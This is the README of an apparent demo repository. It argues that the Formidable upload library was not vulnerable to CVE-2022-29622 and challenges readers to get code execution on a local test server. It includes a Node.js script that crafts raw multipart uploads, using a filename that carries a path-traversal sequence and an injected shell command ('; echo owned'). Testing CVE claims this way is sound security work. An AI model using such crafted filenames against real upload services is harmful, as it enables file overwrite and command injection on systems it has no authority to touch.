CVE-2022-29622: (In)vulnerability Analysis
This codebase was created to help security professionals and developers understand why I think Formidable was not vulnerable to CVE-2022-29622. I have written up my analysis here:
https://medium.com/@zsolt.imre/cve-2022-29622-in-vulnerability-analysis-5cf783c3721
As some did not understand it, I thought I would illustrate my point using actual, running code.
The Server
The server is implemented in index.mjs. It uses Formidable version 3.1.4 to upload any file of your choosing.
I explicitly configured Formidable as shown below:
{
uploadDir: './uploads/',
keepExtensions: true,
}
This way, all files will be uploaded to the uploads directory. I have enabled keepExtensions so that you can get your files with a malicious filename uploaded.
Starting the Server
To set up and start the server, issue the following commands from this directory:
npm install
npm run start
The first command installs all dependencies, including the appropriate version of formidable. The second command will start the server.
Once up and running, you can access the file upload form exposed by the server at: http://127.0.0.1:3000/
Upload a Malicious File
As examples, I have included two files with malicious names in the examples directory.
Files submitted using the form at http://127.0.0.1:3000/ will be uploaded to the uploads directory.
CHALLENGE
The challenge is to see if you can prove that formidable is vulnerable to CVE-2022-29622. To do that, you have to get this web server to execute code that you include in the uploaded file or in the name of the file.
The rules:
- You are allowed to put your malicious payload in the file or within the file's name. (Similar to the examples I have provided.)
- You are allowed to tamper with parts of the HTTP request that are related to file upload. (e.g.: multipart body, content-type, boundary string)
- The only acceptable attack surface is port 3000. You MUST NOT modify any files within this directory.
Only if you can get arbitrary code executed while strictly following the above rules have you proved that formidable was vulnerable to arbitrary code execution.
Suggestion: Probably the simplest visual demonstration would be to get the server to print out a string, for example, "I'm awesome, I've got arbitrary code executed", on the console where you started the web server.
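The rules above let you tamper with exactly three things: the filename, the part's Content-Type and the boundary string. The script below is an added example for crafting such a request by hand (it is not part of this repository and not formidable's code): it builds the raw multipart/form-data body from a constructed payload, inserts the filename verbatim so that quotes, semicolons and traversal sequences reach the parser unescaped, and POSTs the result to 127.0.0.1:3000. The upload form's field name ("file") and form action ("/") are assumptions, not taken from index.mjs; adjust them to match the form you see in the browser.

```javascript
// Added example, not part of this repository: craft the raw multipart/form-data
// upload the challenge lets you tamper with (filename, part Content-Type,
// boundary string) and POST it to the challenge server on 127.0.0.1:3000.
// Assumptions not stated on the page: the form's file field is named "file"
// and the form posts to "/". Change FIELD_NAME / UPLOAD_PATH to match the form.

const FIELD_NAME = 'file'; // assumed field name of the upload form
const UPLOAD_PATH = '/';   // assumed form action
const CRLF = '\r\n';

// Constructed payload: what the server would print if it ever executed the file.
const PAYLOAD = '#!/bin/sh\necho "I\'m awesome, I\'ve got arbitrary code executed"\n';

// Build one multipart part plus the closing delimiter. The filename is inserted
// verbatim (no escaping or encoding) so that quotes, semicolons, slashes and
// "../" sequences arrive at the parser exactly as written.
function buildMultipart({ boundary, fieldName, filename, contentType, content }) {
  const head =
    `--${boundary}${CRLF}` +
    `Content-Disposition: form-data; name="${fieldName}"; filename="${filename}"${CRLF}` +
    `Content-Type: ${contentType}${CRLF}${CRLF}`;
  const tail = `${CRLF}--${boundary}--${CRLF}`;
  return Buffer.concat([
    Buffer.from(head, 'utf8'),
    Buffer.from(content, 'utf8'),
    Buffer.from(tail, 'utf8'),
  ]);
}

// Full request description (method, path, headers, body). Content-Length is
// taken from the body bytes, not the string length, so non-ASCII filenames
// still produce a well-framed request.
function craftUpload({
  filename,
  boundary = '----challenge-' + Date.now(),
  contentType = 'application/x-sh',
  content = PAYLOAD,
  fieldName = FIELD_NAME,
} = {}) {
  const body = buildMultipart({ boundary, fieldName, filename, contentType, content });
  return {
    method: 'POST',
    path: UPLOAD_PATH,
    headers: {
      'Content-Type': `multipart/form-data; boundary=${boundary}`,
      'Content-Length': body.length,
    },
    body,
  };
}

// Send the crafted request with Node's built-in http module and resolve with
// the status code and response body. The module is imported lazily so the
// builders above stay dependency-free.
async function sendUpload(req, host = '127.0.0.1', port = 3000) {
  const http = (await import('node:http')).default;
  return new Promise((resolve, reject) => {
    const r = http.request(
      { host, port, method: req.method, path: req.path, headers: req.headers },
      (res) => {
        let data = '';
        res.setEncoding('utf8');
        res.on('data', (chunk) => { data += chunk; });
        res.on('end', () => resolve({ status: res.statusCode, body: data }));
      },
    );
    r.on('error', reject);
    r.end(req.body);
  });
}

// Run directly (node upload.js) against the running challenge server: the
// filename carries shell metacharacters and a traversal attempt. Afterwards,
// list ./uploads next to index.mjs to see which name the file was stored under.
if (typeof require !== 'undefined' && require.main === module) {
  const req = craftUpload({ filename: '../../x; echo owned #.sh' });
  sendUpload(req)
    .then((res) => console.log(res.status, res.body))
    .catch((err) => console.error(err.message));
}
```

Start the server with npm run start, run the script, then compare the name you sent with the name that appears in the uploads directory: that comparison, not the request itself, is what tells you whether any part of the filename survived into a place where it could matter.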